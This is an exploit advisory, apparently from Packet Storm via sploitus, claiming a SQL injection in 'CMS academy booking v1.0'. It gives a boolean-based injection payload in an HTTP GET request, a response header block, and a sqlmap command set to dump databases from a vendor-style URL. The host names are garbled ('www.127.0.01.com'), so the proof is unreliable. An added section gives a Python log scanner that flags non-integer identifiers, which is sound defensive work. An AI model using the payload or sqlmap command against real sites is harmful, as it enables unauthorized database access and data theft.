## https://sploitus.com/exploit?id=PACKETSTORM:223790
==================================================================================================================================
| # Title : CMS academy booking v1.0 sql injection vulnerability |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 151.0.3 (64 bits) |
| # Vendor : https://www.cookwithping.com/Home/test.php |
==================================================================================================================================
[+] Summary : CMS academy booking v1.0 suffers from an SQL injection vulnerability.
[+] Payload :
GET /Home/index.php?home=news-detail&id=29%20AND%203*2*1%3d6%20AND%20593%3d593 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: https://www.127.0.01.com/Home/index.php?home=treatment-detail&treatment_id=29
Cookie: PHPSESSID=4k9krjvjjhmcdjh99qsd4pce4d
Host: www.127.0.0.1.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Response
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 14 Jun 2026 13:32:02 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 17160
Connection: keep-alive
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Original-Content-Encoding: gzip
[+] POC : E:\sqlmap>python sqlmap.py -u "https://www.127.0.0.1.com/Home/index.php?home=treatment-detail&treatment_id=29" --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 --dbs
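A defender's view of the request shown under Payload, as an added example that is not part of the original advisory: a log scan that flags any request where the numeric identifiers `id` or `treatment_id` decode to something other than a plain integer. The access-log lines are constructed in nginx combined format, and the names `NUMERIC_PARAMS`, `suspicious_params` and `scan` are assumptions of this example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameters the advisory's requests use as numeric record identifiers.
NUMERIC_PARAMS = {"id", "treatment_id"}

# Request line inside a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# A legitimate identifier is ASCII digits only, with a bounded length.
STRICT_INT = re.compile(r"[0-9]{1,10}")

# Constructed sample log (not captured traffic). Line 1 carries the
# query string from the advisory; line 2 is an ordinary page view.
SAMPLE_LOG = [
    '203.0.113.7 - - [14/Jun/2026:13:32:02 +0000] "GET /Home/index.php?'
    'home=news-detail&id=29%20AND%203*2*1%3d6%20AND%20593%3d593 HTTP/1.1" '
    '200 17160 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [14/Jun/2026:13:30:11 +0000] "GET /Home/index.php?'
    'home=treatment-detail&treatment_id=29 HTTP/1.1" 200 16892 "-" "Mozilla/5.0"',
]


def suspicious_params(target):
    """Return [(name, decoded_value)] for numeric params that are not integers."""
    hits = []
    # parse_qsl percent-decodes, so %20 and %3d are compared as ' ' and '='.
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if name in NUMERIC_PARAMS and not STRICT_INT.fullmatch(value):
            hits.append((name, value))
    return hits


def scan(log_lines):
    """Return [(line_number, param, decoded_value)] for every flagged request."""
    findings = []
    for lineno, line in enumerate(log_lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue  # not a parseable request line
        for name, value in suspicious_params(match.group("target")):
            findings.append((lineno, name, value))
    return findings


if __name__ == "__main__":
    for lineno, name, value in scan(SAMPLE_LOG):
        print(f"line {lineno}: {name}={value!r} is not a plain integer")
```

The same digits-only check, applied in the application before the value reaches a parameterized query, rejects the request instead of only reporting it.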
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================